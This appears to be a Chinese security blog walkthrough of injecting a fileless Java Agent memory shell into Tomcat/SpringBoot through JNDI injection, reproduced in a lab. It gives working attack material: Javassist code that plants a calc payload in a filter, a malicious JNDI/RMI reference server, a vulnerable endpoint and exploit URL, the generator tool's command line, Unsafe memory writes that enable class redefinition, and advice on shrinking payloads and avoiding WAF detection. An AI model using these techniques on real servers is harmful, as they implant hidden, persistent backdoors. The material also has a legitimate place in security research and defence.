上个月看了rebeyond、游望之、Xiaopan233师傅介绍无文件落地注入Agent内存马技术的文章,就想着实操复现一下,没想到遇到了很多问题,花了不少时间才解决,于是准备写篇实操记录,帮各位避坑
此项技术适用于具有动态代码上下文执行能力情景下的通用内存马注入(仅仅Runtime.getRuntime().exec()是不行的,必须要有执行多条代码的能力)
提示:阅读本文需要你对JNDI注入、反序列化漏洞有基本认识,当然了解Agent内存马更是必须的;如果对这项技术尚未理解,推荐去那几位师傅的博客看看
接下来我将使用自己写的小工具进行模拟攻击注入,在这个过程中谈几个实战中的问题,如果读者没有实践过,不妨跟着本文动手操作下
项目地址:https://github.com/whocansee/FilelessAgentMemShell (包括测试所需的简易漏洞环境以及新类字节码)
测试环境:Windows 10、JDK8u66、SpringBoot 2(暴露任意反序列化和JNDI接口)
以使用JNDI注入漏洞向JDK低版本、Windows目标打入Agent内存马为例
首先选用常见的org.apache.tomcat.websocket.server.WsFilter
作为宿主类
javassist修改其字节码并输出新的class文件(在其方法体前面添加了计算器)
ClassPool pool = ClassPool.getDefault(); CtClass ctClass = pool.getCtClass("org.apache.tomcat.websocket.server.WsFilter"); CtMethod m = ctClass.getDeclaredMethod("doFilter"); m.insertBefore("Runtime.getRuntime().exec(\"calc\");"); ctClass.writeFile(); ctClass.detach();
在此目录找到生成的新class文件
和工具放到同一目录,使用工具生成最终要让目标加载的类文件(用于将目标类的旧字节码替换为新字节码)
java -jar .\FilelessAgentMemshellGenerator.jar -b 64 -c "org.apache.tomcat.websocket.server.WsFilter" -i false -o "Windows" -p .\WsFilter.class -t false
弹出警告,但还是成功生成了所需的类文件
在工具同目录的out文件夹下可找到AgentMemShell.class
JNDI恶意服务器可以用ysomap等工具快速部署,这里简单讲讲手工步骤
首先需要启动一个RMI服务或者LDAP服务,随便绑定一个远程对象上去
接着使用python -m http.server
在此目录开启一个Http服务
将引用的地址设置为Http服务的URL,如http://localhost:8000/
,设置类名和工厂名
Reference refObj = new Reference("AgentMemShell","AgentMemShell","http://localhost:8000/");
再将引用重绑定给JNDI服务
InitialContext initialContext = new InitialContext();
initialContext.rebind("rmi://localhost:11451/remoteObj",refObj);
最后启动JNDI服务
import javax.naming.InitialContext; import javax.naming.Reference; public class JNDIServer { public static void main(String[] args) throws Exception{ InitialContext initialContext = new InitialContext(); Reference refObj = new Reference("AgentMemShell","AgentMemShell","http://localhost:8000/"); initialContext.rebind("rmi://localhost:11451/remoteObj",refObj); } }
启动漏洞环境,代码如下
@GetMapping({"/jndi"}) public void jndi(@RequestParam String b) throws Exception { byte[] decodedBytes = Base64.getDecoder().decode(b); String decodedUrl = new String(decodedBytes , StandardCharsets.UTF_8); InitialContext ctx = new InitialContext(); ctx.lookup(decodedUrl); }
访问URL完成攻击 (传过去的jndi-url
是rmi://localhost:11451/remoteObj
)
http://localhost:8080/memShell/jndi?b=cm1pOi8vbG9jYWxob3N0OjExNDUxL3JlbW90ZU9iag==
随便访问一个不存在的目录,成功弹出了计算器
没有意外的话此时你应该很顺利地成功注入了Agent内存马,并且没有落地任何文件!
如果此时想换一个宿主类,比如org.apache.catalina.core.ApplicationFilterChain
其他步骤不变,只是在Javassit修改类以及用工具生成最终类的时候改变参数,从而生成能够替换org.apache.catalina.core.ApplicationFilterChain
类的EXP
再次利用JNDI注入打入内存马,你会发现没有生效,查看Spring控制台应该能看到以下报错:
为什么呢?
当我们使用JavaAgent进行类动态替换时,若新类字节码中含有lambda表达式,则会报错,问题可能出在Instrument API内部实现逻辑上
恰巧,常用的宿主类org.apache.catalina.core.ApplicationFilterChain
中的doFilter()
方法就含有lambda表达式,我最开始测试时,无论怎么检查都还是一直报错,直到控制变量使用了其它的宿主类才发现原因
理论上来说,使用Javassist修改此方法就可以删除掉lambda表达式了,然而事情并没有这么简单,经过测试发现,Javassist一旦加载了包含lambda表达式的类,不管是添加方法体还是替换方法体,都无法完全删除lambda表达式
那该怎么办呢?
最简单的方法,在这里给出Tomcat容器下可用的宿主类(请求处理流程中的必经之类,且可以在不影响正常运转的前提下增加shell逻辑)
(粗体为推荐使用的类)
其中org.apache.tomcat.websocket.server.WsFilter
、org.apache.catalina.core.StandardContextValve
是既没有lambda表达式,又长度较短的类
(注意,如果选用org.apache.catalina.core.StandardContextValve
作为宿主类,则应该要修改它的invoke()
方法体)
不是什么时候都可以换类逃避的,Agent内存马通用性极强,这就意味着它需要面对许多不同的场景,当遇到不得不选择包含lambda表达式的宿主类时:
除了解决问题,别无他法
这里给出最合适的解决方案以及自己的探索过程
有接触过字节码修改技术的师傅应该都用过Java下的ASM框架,相较于Javassist框架,其功能更为强大,删除lambda表达式显然是不在话下的
然而本人水平有限,没有找到单独删除lambda表达式的通用方法,只想到完全删除方法体的办法来去除lambda表达式,后续再使用Javassist读取ASM生成的字节码,从而简单地编写复杂的shell逻辑,比较迂回和麻烦
这里给出ChatGPT写的利用ASM框架删除目标类某方法体中所有内容(包括lambda表达式)并替换为输出"Hello World"的代码:
import org.objectweb.asm.*; import java.io.FileOutputStream; import java.io.IOException; public class ModifyCalcMethod { public static void main(String[] args) { try { byte[] modifiedClass = modifyCalcMethod(); // 将修改后的类写入文件 try (FileOutputStream fos = new FileOutputStream("Hello.class")) { fos.write(modifiedClass); } System.out.println("Modified class written to: Hello.class"); } catch (IOException e) { e.printStackTrace(); } } public static byte[] modifyCalcMethod() throws IOException { // 指定要修改的类 ClassReader classReader = new ClassReader("org.apache.catalina.core.ApplicationFilterChain"); ClassWriter classWriter = new ClassWriter(ClassWriter.COMPUTE_FRAMES); ClassVisitor classVisitor = new ClassVisitor(Opcodes.ASM7, classWriter) { @Override public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) { //指定要修改的方法 if (name.equals("doFilter")) { MethodVisitor newMethod = super.visitMethod(access, name, desc, signature, exceptions); newMethod.visitCode(); newMethod.visitFieldInsn(Opcodes.GETSTATIC, "java/lang/System", "out", "Ljava/io/PrintStream;"); newMethod.visitLdcInsn("Hello, World!"); newMethod.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false); newMethod.visitInsn(Opcodes.RETURN); newMethod.visitMaxs(2, 1); newMethod.visitEnd(); // 想要去掉Hello World用Javassist二次编辑就行了 return null; // 返回 null 表示清空原始方法体 } else { return super.visitMethod(access, name, desc, signature, exceptions); } } }; classReader.accept(classVisitor, 0); return classWriter.toByteArray(); } }
不出意外的话,问题顺利解决了
此时你可能有一个疑惑,源码中看到的lambda表达式就那么几行,为什么这么难删?
事实上,Javassist和ASM框架操作的都是在字节码级别上操作修改类,前者用着确实很方便,可以像操作源代码一样操作字节码,但后果就是一旦出现问题,很难找到根本原因并解决;后者ASM虽然精确而强大,但操作起来却非常复杂繁琐
如此一来,似乎直接操作源代码是最好的选择
大部分第三方组件库都是可以拿到源码的,我们可以修改源码,然后再自行编译,从而简单地删除lambda表达式
然而,其依赖关系通常错综复杂,所以需要一些精细的操作
以修改org.apache.catalina.core.ApplicationFilterChain
为例 找到其所处jar包的源码,我这里使用的是tomcat-embed-core-9.0.63-sources
解压source-jar包,找到目标类的java文件(以及目录文件夹)并单独拿出来
在其同一目录创建IDEA项目,添加所需依赖(此例为Maven中的springframework.boot.spring.starter.web
的对应版本2.7.0
)
然后就可以简单地修改源码并顺利编译了,成功得到新class文件!
接着替换修改后的字节码,然而却遇到了新报错:
JavaAgent技术的确是不允许增删方法、增删属性值的,但我们只是删除了源码中的lambda表达式部分,为什么会引起这个报错呢?
事实上,编译后的Lambda表达式本质上是一种匿名函数,其可以视为对函数接口的实现
因此,对于org.apache.catalina.core.ApplicationFilterChain
类中包含了lambda表达式的部分代码
java.security.AccessController.doPrivileged( (java.security.PrivilegedExceptionAction<Void>) () -> { internalDoFilter(req,res); return null; } );
使用以下代码来代替
java.security.AccessController.doPrivileged( new java.security.PrivilegedExceptionAction<Void>() { @Override public Void run() throws Exception { internalDoFilter(req, res); return null; } } );
编译,得到class文件,动态替换类
仍然报错........
看来Instrument API并不认同这种等效代替方案,那简直有点无计可施了,只剩下最后的方法
参考JRebel,spring-loaded,hotcode2等热部署工具的原理,在每个调用了ApplicationFilterChain.filter()
的地方都做一层代理,直接加载一个全新的代理类,也就能突破不允许增删方法、增删属性值的限制了
需要替换多个类,这显然很麻烦,看来还是换宿主类和换框架最方便
看完源代码修改这节的师傅或许会有一个疑惑,既然删除lambda表达式相关代码会造成增删方法的效果
那ASM框架又是怎么做到既能删除lambda表达式又不违反Instrument API要求的呢?
如果熟悉类字节码结构的话就很好理解,我给出的利用ASM删除lambda表达式的代码,其实际上只是清空了doFilter()
方法中残余的会引发Instrument API报错的数据,并没有删掉字节码中lambda表达式经过编译而生成的方法
编译字节码和运行工具时,尽量使用低版本JDK,以获得更好的兼容性
除去对于漏洞利用的影响(如JNDI注入高版本低版本区别)
目标采用的是JDK11还是JDK8,对于EXP生成也有几个方面的影响:
can_redefine_classes
偏移在普通Java Agent使用中,agent.jar
的MANIFEST.MF
文件中有一行配置
Can-Redefine-Classes
,其决定了是否能使用redefineClasses()
方法来动态替换类
无文件落地Agent技术中,它的数值存放于jvmtiEnv*
指针所指向内存地址后的某个偏移量处
其默认为零,因此需要为它填充数值
不同JDK大版本下偏移量的数值是不同的,理论上需要搜寻所有的偏移量,根据不同JDK版本设置不同的EXP
经过测试,向多个可能的内存地址都填充值也能正常运作,所以我在项目中是这样实现的(针对64位目标)
unsafe.putByte(native_jvmtienv + 377, (byte) 2); unsafe.putByte(native_jvmtienv + 361, (byte) 2); unsafe.putByte(native_jvmtienv + 369, (byte) 2);
JDK8下,Java默认会对Unsafe的调用进行警告,并提示将在未来版本删除它
到了JDK11,必须要在编译时添加相关参数才能使用Unsafe
JDK11下,执行完动态替换类操作后,目标的控制台会出现警报
具体在JDK17之后,完全禁止了不安全的反射调用
向Windows目标注入shellcode时,需要用到虚拟机相关的类,其在不同JDK版本类名发生了变化
JDK8: WindowsVirtualMachine
JDK9及更高: VirtualMachineImpl
以上所有点都已在项目中得到解决
在此次测试中,利用JNDI注入漏洞打入Agent内存马一般不存在payload长度限制的问题,然而
当实战环境下需要利用反序列化漏洞一次打入Agent内存马时,由于包含了大量的硬编码字节码以及shellcode,最终编译出的字节码会很大,payload长度会很长,并不适用于一些只能通过GET参数甚至请求头打入反序列化payload的情况;就算是用POST,由于传输数据量过大,也有被WAF检测的风险
有关这个问题,我将在之后单独探讨payload长度受限时的千方百计,并在工具的后续更新中完成部分自动化缩短实现
此处仅给出最有效的几条路径
这就要求在选用宿主类阶段就优先考虑内容比较少的类,或是在不影响正常逻辑的前提下删掉所有能删的方法体内容
在目标出网的前提下,通过UnicastRef链、LDAPAttribute链,开启新反序列化入口
不同的中间件对于不同的payload插入位置(URL、请求头、POST数据)有不同的限制,在注入之前先解除长度限制也是一种清奇的思路
Java内存攻击技术漫谈 https://xz.aliyun.com/t/10075
论如何优雅的注入Java Agent内存马 https://xz.aliyun.com/t/11640
Linux下无文件Java agent探究 https://tttang.com/archive/1525
Linux下内存马进阶植入技术 https://xz.aliyun.com/t/10186
终极Java反序列化Payload缩小技术 https://developer.aliyun.com/article/1160545